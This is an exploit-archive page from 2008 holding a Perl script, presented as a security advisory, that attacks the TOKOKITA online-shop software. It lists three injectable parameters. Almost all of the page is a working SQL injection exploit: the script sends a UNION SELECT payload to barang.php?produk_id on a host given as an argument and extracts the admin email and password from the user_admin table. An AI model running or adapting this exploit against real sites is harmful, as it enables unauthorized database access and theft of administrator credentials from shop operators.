Home / exploits tokokita-sql.txt
Posted on 26 June 2008
#!/usr/bin/perl # k1tk4t Public Security Advisory # //////////////////////////////////////////////////////////// # TOKOKITA Multiple Remote SQL Injection # Demosite : http://www.tokokita.net/toko/ # Vendor : http://www.tokokita.com/ # Kutu : 1. catlist.php?cat_id=[Blind SQLi] # 2. catlist_detail.php?cat_id=[Blind SQLi] # 3. barang.php?produk_id=[SQLi] # Terimakasih untuk ; # str0ke,DNX,n0c0py,L41n, # NTOS-Team->[fl3xu5,opt1lc,sakitjiwa], # eCHo->[y3dips,K-159,lirva32,dan staff lainnya] use LWP::UserAgent; if ( !$ARGV[1] ) { print " //////////////////////////////////////////////////////////////////"; print " // ..::> k1tk4t <::.. //"; print " // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //"; print " //////////////////////////////////////////////////////////////////"; print " [!] "; print " [!] Penggunaan : perl tokokita.pl [Site] [Path]"; print " [!] Contoh : perl tokokita.pl localhost /toko/"; print " [!] "; print " "; exit; } $site = $ARGV[0]; $path = $ARGV[1]; $sqlinj = "union+ select+ null, null, null, concat(0x6b3174,email,0x316e), null, concat(0x6b3474,password,0x307574), null, null, null, null, null+ from+ user_admin/*"; $expl = "http://" . $site . $path . "barang.php?produk_id=-9+" . $sqlinj; $www = new LWP::UserAgent; print " [!] Injeksi SQL "; $res = $www->get($expl) or err (); $hasil = $res->content; if ( $hasil =~ /k1t(.*?)1n/ ) { print " [+] Username : $1"; $hasil =~ /k4t(.*?)0ut/, print " [+] Password : $1"; print " "; } else { print " [-] Exploit gagal ;)"; exit(); }
